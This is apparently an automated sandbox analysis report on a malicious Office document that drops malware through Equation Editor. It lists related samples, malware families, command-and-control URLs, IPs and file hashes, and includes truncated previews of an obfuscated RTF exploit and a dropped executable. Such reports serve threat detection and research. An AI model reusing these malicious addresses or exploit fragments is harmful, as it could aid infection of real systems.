                                                                • Changed system and user locale, location and keyboard layout to French - France
                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                • Attach to Office via COM
                                                                • Active ActiveX Object
                                                                • Active ActiveX Object
                                                                • Scroll down
                                                                • Close Viewer
                                                                • Override analysis time to 55090.7280723813 for current running targets taking high CPU consumption
                                                                • Override analysis time to 110181.456144763 for current running targets taking high CPU consumption
                                                                • Override analysis time to 220362.912289525 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                                                                • Execution Graph export aborted for target EQNEDT32.EXE, PID 3164 because there are no executed function
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                07:40:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                                                                10:39:54API Interceptor75x Sleep call for process: EQNEDT32.EXE modified
                                                                10:40:02API Interceptor7492446x Sleep call for process: svchost.exe modified
                                                                10:40:12API Interceptor12x Sleep call for process: wscript.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                188.114.97.3http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                                                • host.cloudsonicwave.com/favicon.ico
                                                                alWUxZvrvU.exeGet hashmaliciousFormBookBrowse
                                                                • www.avantfize.shop/q8x9/
                                                                foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                • www.bayarcepat19.click/fxts/
                                                                RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                • servicetelemetryserver.shop/api/index.php
                                                                1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                                                • www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                • www.launchdreamidea.xyz/bd77/
                                                                http://embittermentdc.comGet hashmaliciousUnknownBrowse
                                                                • embittermentdc.com/favicon.ico
                                                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                • paste.ee/d/gvOd3
                                                                IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                • www.bayarcepat19.click/yuvr/
                                                                188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                                • touxzw.ir/sirr/five/fre.php
                                                                lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                • www.airgame.store/ojib/
                                                                Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                • www.cc101.pro/59fb/
                                                                octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                • servicetelemetryserver.shop/api/index.php
                                                                bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                                • www.rtprajalojago.live/2uvi/
                                                                lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                • www.serverplay.live/71nl/
                                                                sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                • www.cc101.pro/0r21/
                                                                E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                • paste.ee/d/VO2TX
                                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • filetransfer.io/data-package/fOmsJ2bL/download
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                shuvi.ioSTATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.3
                                                                geoplugin.netSTATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUShttp://coin-have.c0mGet hashmaliciousUnknownBrowse
                                                                • 1.1.1.1
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                SecuriteInfo.com.Win32.CrypterX-gen.869.7164.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                CLOUDFLARENETUShttp://coin-have.c0mGet hashmaliciousUnknownBrowse
                                                                • 1.1.1.1
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                SecuriteInfo.com.Win32.CrypterX-gen.869.7164.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                ATOM86-ASATOM86NLSTATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                AS-COLOCROSSINGUSfacturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 198.46.178.134
                                                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 198.46.178.134
                                                                172866025525495dd8e8afca3f3b56403378ef77acfe3af22ea24afc36e105013588df0d1b286.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 192.3.101.184
                                                                ESUTbYTvlp.elfGet hashmaliciousUnknownBrowse
                                                                • 172.245.184.204
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 192.3.165.37
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 107.173.4.16
                                                                ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                • 108.174.58.39
                                                                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                • 172.245.191.98
                                                                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                • 172.245.191.98
                                                                PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
                                                                • 172.245.123.25
                                                                AS-COLOCROSSINGUSfacturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 198.46.178.134
                                                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 198.46.178.134
                                                                172866025525495dd8e8afca3f3b56403378ef77acfe3af22ea24afc36e105013588df0d1b286.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 192.3.101.184
                                                                ESUTbYTvlp.elfGet hashmaliciousUnknownBrowse
                                                                • 172.245.184.204
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 192.3.165.37
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 107.173.4.16
                                                                ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                • 108.174.58.39
                                                                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                • 172.245.191.98
                                                                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                • 172.245.191.98
                                                                PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
                                                                • 172.245.123.25
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607dSTATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                RFQ.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                klYCjbl66s.rtfGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                1njpP9QcUg.rtfGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                7dcce5b76c8b17472d024758970a406bSTATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                QKnj2Wb3yo.xlsxGet hashmaliciousHidden Macro 4.0Browse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                KjFT0qPTo4.vbsGet hashmaliciousFormBookBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                Quotation_398893.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                Documentosrs.ppamGet hashmaliciousRevengeRATBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                No context
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):131072
                                                                Entropy (8bit):0.02573908657392288
                                                                Encrypted:false
                                                                SSDEEP:6:I3DPcHvyoKuP9HvxggLRj8/etf/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPU9PPceZbvYg3J/
                                                                MD5:21DCCF6BAE0719DCDB0533E1E50F6D82
                                                                SHA1:44A5CF1723E1EBED117FB33C384718A14C6DB7E0
                                                                SHA-256:A4C7250EBCD74226AD8A7B0398E56DFCD0DD86A7F1A46790454F4025119DC8CA
                                                                SHA-512:02EACD9F7DAA5227CA839D77B719203CCB514B8784CEF013E8CC9CB50788B145212F516905680FA5ECEC160CD87951C33F6D3A66AB513F32158280E46D717AB8
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:......M.eFy...z@r.'m..C..[..1.+S,...X.F...Fa.q............................t...7.sB..."...6............D.CG....".u......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):962
                                                                Entropy (8bit):5.013811273052389
                                                                Encrypted:false
                                                                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Rich Text Format data, version 1
                                                                Category:dropped
                                                                Size (bytes):88612
                                                                Entropy (8bit):2.9267754728039796
                                                                Encrypted:false
                                                                SSDEEP:768:t9QdTYkH9SFwul5U0mGL8ogS2fw6Vgr9JE:Mkkdzuglo8og3fJVmE
                                                                MD5:C7B4EC460B896CCD9F368467D06EE44B
                                                                SHA1:58D4ED5D5791401F4555D6278A179E5C65563C8A
                                                                SHA-256:7B33DE62DAFEF125FE428AFE47E9A353749A6632D58809CE428B7514886B49B6
                                                                SHA-512:D82B5ECC391F92E17161CE7B98F62B273F9A51D6C294272AACC1EFA1B2D2DC7C8C1095103197D6FE023B21D8B161978C4C6073AED78758649031DA99FD687D9C
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, Author: ditekSHen
                                                                Preview:{\rtf1..{\*\fuAM1lx8ZkPnbkOCimO5dV3rHvsM8U67kI1ddcL4KhvChijOW80CM7opbLd7k2Mg4EWGPEhOERIGzLNu}..{\2132927736(??80.<2?|]-~.(`,,($$%3%>*?['%?970`6@9%24?%>=!/?9]*%.`_:=..*-!8]6?.*2+>4<33=[?.$]&%/~-6>+_#,%?:;-9,?(|6'=8&-69%.9[=*~).*[4^@?3%:%].$?0/^3?!4]%]=1).?9`<$]0.2>;?@15,?19?'!!:???).621*9.?<9?#',*?@.)>|94,!<%'.?*$??:>'?9]_`<+]3`=.%0./.2?.|^0..7/>0&.3/5%]|[!/3&4?%~?.|9#7]>--,~1`%.)>]?|+1^|6/35'?/310&.^??8-,?8^/9:00|`:_^)>+&?,?2+#?[$|1+'$??(%.(@=7.)?%,26?<5?:^9.**_%!2?;1.0>^`7.!?)7>83?`]7.(3?4+0<=)%+~8?9?(?3^/@9_:&%5.'^324_0!]*48'[??.7#2~4?>~=4?[0(7@>@.?5%.*3.6$1@??=.?-01!`(@53.@$8$#9#?`.($5?:|9#?%#@__?&?$?/6./5~>(?|0(/.#_??%.|,#-[@18.?_%.=?<~|1/96[^3,~4?>-+=#=.|,/`;:~&??<]%?.[].78?.09.4..(_?.''(?!@]?@%_~/@%#@?.~,~:?@@?2+|&?++>>#5?|@=1@..']~89+4~/=:.`5<|*96,??%5>:+=;)9?+*&^^7(*;!?)<_(`(?`_;:(-=:?.!+@?=2~;???.??:9?9<7*<)0%;6%7~%'??1~2*],3?5_?0].'2>*$'48:,/=<:=[$??*<=3?:1.;>7:4>^|9]^'4=+[^*~&%+@-?|`&.!].@|:9%;[+4?-<'@5)6?.%62?=-)>&(.>(89`&83'?.'-|?.'','/?:]3`.?|$4=.%%2|^^[78++?:<5)[2|4]?$'=
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1290752
                                                                Entropy (8bit):7.269682117155447
                                                                Encrypted:false
                                                                SSDEEP:24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
                                                                MD5:6539C2C942C9AA3AB9C7FE14FCCF0B4E
                                                                SHA1:F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
                                                                SHA-256:D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
                                                                SHA-512:9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):46340
                                                                Entropy (8bit):3.1486588282570183
                                                                Encrypted:false
                                                                SSDEEP:384:XTiEDqxfTfed3edmiFegX4x4yTQw2/1o90LqQl+0CbdvpEcSRIeRL:jikdOEgu4y0952ec1Q
                                                                MD5:A429380AAFA2574DEE99DFE015236785
                                                                SHA1:2396BF637223547213E74E630132DE4BFE77B822
                                                                SHA-256:4C0DF4F3E97A56FD198FC092D1031A47FD873A55F2676C876110E4CDA2ABAF90
                                                                SHA-512:854A0014D8BF91B3035C31C008A2C23E0DFEF8ED3A2480A6F2993AD43E03F582E3D8868E6BBB5C209C6544640C890216BA846765EC710FF2C55635E9FF99DA39
                                                                Malicious:false
                                                                Preview:....l...........N................@.._Y.. EMF........7.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................O.......%...........%...........R...p................................@. C.a.l.i.b.r.i.........................................................D................................2%.........d...........0.......0...............E.......0.......0.......0.....7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................&.f.............`.0.....X.0.....`.0...............E.....X.0.....X.0.....`.0.....7......................@.N..............C.a.l.i.b.r.i...........
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):38272
                                                                Entropy (8bit):2.8200425031385645
                                                                Encrypted:false
                                                                SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                Malicious:false
                                                                Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):2342852
                                                                Entropy (8bit):2.6417290025884554
                                                                Encrypted:false
                                                                SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                Malicious:false
                                                                Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):2342852
                                                                Entropy (8bit):2.6417290025884554
                                                                Encrypted:false
                                                                SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                Malicious:false
                                                                Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):8084
                                                                Entropy (8bit):2.570503528684488
                                                                Encrypted:false
                                                                SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                Malicious:false
                                                                Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):884312
                                                                Entropy (8bit):1.2944965349348616
                                                                Encrypted:false
                                                                SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                Malicious:false
                                                                Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
